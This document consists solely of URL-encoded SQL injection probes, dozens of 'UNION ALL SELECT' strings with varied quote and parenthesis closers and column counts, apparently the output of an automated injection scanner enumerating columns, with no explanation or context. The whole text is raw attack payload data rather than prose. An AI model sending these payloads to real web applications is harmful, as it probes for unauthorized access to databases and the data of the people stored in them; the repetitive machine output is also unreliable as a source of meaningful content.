-2539%27%29%20UNION%20ALL%20SELECT%209679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%2C9679%23 -1125%27%29%20UNION%20ALL%20SELECT%207064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%2C7064%23 -7781%27%29%20UNION%20ALL%20SELECT%208527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%2C8527%23 -1766%27%29%20UNION%20ALL%20SELECT%208549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%2C8549%23 -5797%27%29%20UNION%20ALL%20SELECT%205976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%2C5976%23 -6922%27%29%20UNION%20ALL%20SELECT%204401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%23 -9754%27%20UNION%20ALL%20SELECT%205688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%2C5688%23 -9176%27%20UNION%20ALL%20SELECT%203993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%23 -6822%27%20UNION%20ALL%20SELECT%205958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%2C5958%23 -1269%27%20UNION%20ALL%20SELECT%209611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%2C9611%23 -3477%27%20UNION%20ALL%20SELECT%208137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%2C8137%23 -5186%27%20UNION%20ALL%20SELECT%207228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%2C7228%23 -3342%27%20UNION%20ALL%20SELECT%204675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%2C4675%23 -9501%27%20UNION%20ALL%20SELECT%205401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%2C5401%23 -2434%27%20UNION%20ALL%20SELECT%205801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%23 -5580%27%20UNION%20ALL%20SELECT%208420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%2C8420%23 -6696%22%20UNION%20ALL%20SELECT%204323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%2C4323%23 -3385%22%20UNION%20ALL%20SELECT%207571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%2C7571%23 -7265%22%20UNION%20ALL%20SELECT%205327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%2C5327%23 -8424%22%20UNION%20ALL%20SELECT%205746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%2C5746%23 -6934%22%20UNION%20ALL%20SELECT%203056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%2C3056%23 -5500%22%20UNION%20ALL%20SELECT%201467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%2C1467%23 -2105%22%20UNION%20ALL%20SELECT%209835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%2C9835%23 -6292%22%20UNION%20ALL%20SELECT%209844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%2C9844%23 -3958%22%20UNION%20ALL%20SELECT%207431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%2C7431%23 -4418%22%20UNION%20ALL%20SELECT%202989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%2C2989%23 -6664%29%20UNION%20ALL%20SELECT%202208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%2C2208%23 -3698%29%20UNION%20ALL%20SELECT%206679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%2C6679%23 -8217%29%20UNION%20ALL%20SELECT%206241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%23 -3790%29%20UNION%20ALL%20SELECT%205272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%2C5272%23 -1393%29%20UNION%20ALL%20SELECT%204319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%2C4319%23 -5865%29%20UNION%20ALL%20SELECT%206940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%2C6940%23 -3793%29%20UNION%20ALL%20SELECT%209277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%23 -1520%29%20UNION%20ALL%20SELECT%205670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%2C5670%23 -3932%29%20UNION%20ALL%20SELECT%206731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%23 -6149%29%20UNION%20ALL%20SELECT%208482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%23 -1976%29%29%20UNION%20ALL%20SELECT%204063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%23 -5090%29%29%20UNION%20ALL%20SELECT%205000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%2C5000%23 -3225%29%29%20UNION%20ALL%20SELECT%209851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%23 -4924%29%29%20UNION%20ALL%20SELECT%202827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%2C2827%23 -2238%29%29%20UNION%20ALL%20SELECT%203635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%2C3635%23 -2365%29%29%20UNION%20ALL%20SELECT%204342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%2C4342%23 -1618%29%29%20UNION%20ALL%20SELECT%207667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%23 -5827%29%29%20UNION%20ALL%20SELECT%209766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%2C9766%23 -5924%29%29%20UNION%20ALL%20SELECT%206235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%2C6235%23 -6896%29%29%20UNION%20ALL%20SELECT%204509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%2C4509%23 -7445%29%29%29%20UNION%20ALL%20SELECT%208799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%2C8799%23 -9778%29%29%29%20UNION%20ALL%20SELECT%201821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%2C1821%23 -2045%29%29%29%20UNION%20ALL%20SELECT%205365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%23 -1426%29%29%29%20UNION%20ALL%20SELECT%206868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%2C6868%23 -5642%29%29%29%20UNION%20ALL%20SELECT%209342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%2C9342%23 -2522%29%29%29%20UNION%20ALL%20SELECT%204532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%2C4532%23 -9333%29%29%29%20UNION%20ALL%20SELECT%203231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%2C3231%23 -9091%29%29%29%20UNION%20ALL%20SELECT%209535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%2C9535%23 -9799%29%29%29%20UNION%20ALL%20SELECT%208440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%2C8440%23 -8251%29%29%29%20UNION%20ALL%20SELECT%207742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%2C7742%23 -4008%20UNION%20ALL%20SELECT%206755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%2C6755%23 -5782%20UNION%20ALL%20SELECT%209791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%2C9791%23 -3502%20UNION%20ALL%20SELECT%205771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%2C5771%23 -5360%20UNION%20ALL%20SELECT%204665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%2C4665%23 -4191%20UNION%20ALL%20SELECT%208169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%2C8169%23 -7321%20UNION%20ALL%20SELECT%204980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%23 -4400%20UNION%20ALL%20SELECT%202269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%23 -6594%20UNION%20ALL%20SELECT%208639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%2C8639%23 -4752%20UNION%20ALL%20SELECT%203869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%23 -1787%20UNION%20ALL%20SELECT%202292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%2C2292%23 -7996%27%29%20UNION%20ALL%20SELECT%204070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%2C4070%23 -2491%27%29%20UNION%20ALL%20SELECT%202811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%2C2811%23 -9005%27%29%20UNION%20ALL%20SELECT%206575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%2C6575%23 -8836%27%29%20UNION%20ALL%20SELECT%203249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%23 -4902%27%29%20UNION%20ALL%20SELECT%209070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%2C9070%23 -7859%27%29%20UNION%20ALL%20SELECT%202253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%2C2253%23 -7423%27%29%20UNION%20ALL%20SELECT%205148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%2C5148%23 -5113%27%29%20UNION%20ALL%20SELECT%203547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%23 